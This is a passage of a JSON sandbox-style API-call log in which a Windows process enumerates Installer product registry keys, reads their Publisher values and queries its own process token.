"REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 198 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 199 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 200 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 201 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 202 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 203 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "7" }, { "name": "Name", "value": "DEDD26948C27133438B0903EEA696564" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" } ], "repeated": 0, "id": 204 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 205 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 206 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 207 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 208 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 209 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 210 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\x7f\\x00\\x01\\x00" } ], "repeated": 0, "id": 211 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 212 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" } ], "repeated": 0, "id": 213 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 214 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 215 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 216 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\DEDD26948C27133438B0903EEA696564" } ], "repeated": 0, "id": 217 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 218 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 219 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 220 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 221 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties" } ], "repeated": 0, "id": 222 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 223 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 224 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 225 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 226 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 227 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 228 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "8" }, { "name": "Name", "value": "E9F59850C17A7A840A2E45D143500A35" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" } ], "repeated": 0, "id": 229 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 230 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 231 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 232 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 233 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 234 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 235 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\x7f\\x00\\x01\\x00" } ], "repeated": 0, "id": 236 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 237 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" } ], "repeated": 0, "id": 238 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 239 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 240 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 241 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35" } ], "repeated": 0, "id": 242 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 243 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 244 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 245 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 246 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties" } ], "repeated": 0, "id": 247 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 248 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 249 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 250 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 251 }, { "timestamp": "2025-02-27 23:34:21,566", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, 